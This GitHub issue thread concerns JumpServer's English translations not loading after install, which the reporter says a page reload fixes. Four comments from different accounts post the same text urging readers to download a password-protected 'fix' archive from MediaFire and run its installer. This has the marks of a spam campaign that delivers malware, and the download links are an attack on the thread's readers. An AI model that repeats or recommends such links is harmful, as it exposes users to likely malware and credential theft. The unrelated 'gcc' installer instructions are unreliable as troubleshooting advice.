### ISSUE TITLE
[Bug] English translations doesn't seem to be loaded

### ISSUE THREAD

**Issue by eduardomozart** [jumpserver/jumpserver#14027]
### Product Version

4.1.0

### Product Edition

- [X] Community Edition
- [ ] Enterprise Edition
- [ ] Enterprise Trial Edition

### Installation Method

- [X] Online Installation (One-click command installation)
- [ ] Offline Package Installation
- [ ] All-in-One
- [ ] 1Panel
- [ ] Kubernetes
- [ ] Source Code

### Environment Information

Running on Debian 12.6 64-bit (minimal install).

### 🐛 Bug Description

Hello,
After installing JumpServer following https://en-docs.jumpserver.org/quick_start/ it doesnt' seems to load English translation as expected.

### Recurrence Steps

Do JumpServer install using One-Click installer hosted on GitHub. Log-in in UI.

### Expected Behavior

The sidebar and most text seems to be placeholders which are not translated. I believe translation isn't being loaded.

Printscreen from quickstart in https://en-docs.jumpserver.org/quick_start/#24-create-application-for-database :
![image](https://github.com/user-attachments/assets/07283bc0-0274-493d-a75b-370c9862970c)

My environment:
![image](https://github.com/user-attachments/assets/8272698b-4987-4c33-9ba2-70df02dd1b12)

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by eduardomozart** [comment]
Reloading the page through Ctrl + R seems to fix the issue.
